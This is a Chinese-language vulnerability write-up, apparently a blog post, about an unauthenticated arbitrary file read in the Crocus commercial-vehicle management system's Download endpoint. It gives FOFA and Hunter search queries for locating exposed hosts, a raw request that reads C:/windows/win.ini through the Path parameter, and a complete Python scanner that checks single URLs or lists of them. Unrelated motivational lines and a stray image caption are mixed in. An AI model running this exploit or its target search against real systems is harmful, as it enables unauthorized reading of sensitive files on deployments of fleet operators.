声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
Crocus系统旨在利用人工智能、高清视频、大数据和自动驾驶技术,帮助商用车减少交通事故和货物丢失,提高企业或车队的运营效率。其Download接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件。
漏洞复现
1)信息收集
fofa:body="inp_verification"
hunter:web.body="inp_verification"
生活中最重要的不是凯旋,而是奋斗。
2)构造数据包
GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
Host:ip
成功读取win.ini文件,存在任意文件读取漏洞
测试工具
poc
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
该脚本用于检测目标URL是否存在Crocus-Download任意文件读取漏洞。
通过发送HTTP请求并检查响应内容来判断漏洞是否存在。
"""import requests
import argparse
from urllib3.exceptions import InsecureRequestWarning# 忽略SSL证书验证警告
# 忽略证书验证警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)# 定义常量,用于文本颜色高亮
RED = '\033[91m'
RESET = '\033[0m'def check_file_read(url):"""检查给定URL是否存在任意文件读取漏洞。:param url: 待检测的URL。"""# 设置User-Agent头,模拟浏览器请求headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15'}# 构造请求的URL,尝试读取C:/windows/win.ini文件file_read_url = f"{url.rstrip('/')}/Service.do?Action=Download&Path=C:/windows/win.ini"try:# 发送GET请求,并忽略SSL证书验证response = requests.get(file_read_url, headers=headers, verify=False, timeout=30)# 检查响应状态码是否为200,并且响应内容是否包含"fonts",作为漏洞存在的标志if response.status_code == 200 and "fonts" in response.text:print(f"{RED}URL [{url}] 存在 Crocus-Download 任意文件读取漏洞{RESET}")else:print(f"URL [{url}] 可能不存在漏洞")except requests.RequestException as e:# 打印请求过程中发生的异常print(f"URL [{url}] 请求失败: {e}")def main():"""主函数,负责解析命令行参数并调用漏洞检测函数。"""# 使用argparse库解析命令行参数parser = argparse.ArgumentParser(description='检测目标地址是否存在 Crocus-Download 任意文件读取漏洞')parser.add_argument('-u', '--url', help='指定目标地址')parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')args = parser.parse_args()# 如果指定了URL参数if args.url:# 如果URL没有以http://或https://开头,自动添加if not args.url.startswith("http://") and not args.url.startswith("https://"):args.url = "http://" + args.urlcheck_file_read(args.url)# 如果指定了文件参数elif args.file:# 打开文件,读取其中的URLswith open(args.file, 'r') as file:urls = file.read().splitlines()# 遍历每个URL进行检测for url in urls:# 如果URL没有以http://或https://开头,自动添加if not url.startswith("http://") and not url.startswith("https://"):url = "http://" + urlcheck_file_read(url)if __name__ == '__main__':main()
运行截图
实践是检验真理的唯一标准。
![[论文笔记]涨点近5%! 以内容中心的检索增强生成可扩展的级联框架:Pistis-RAG](https://img-blog.csdnimg.cn/img_convert/f33b9bc571cdf8322c5a56011f9849be.png)
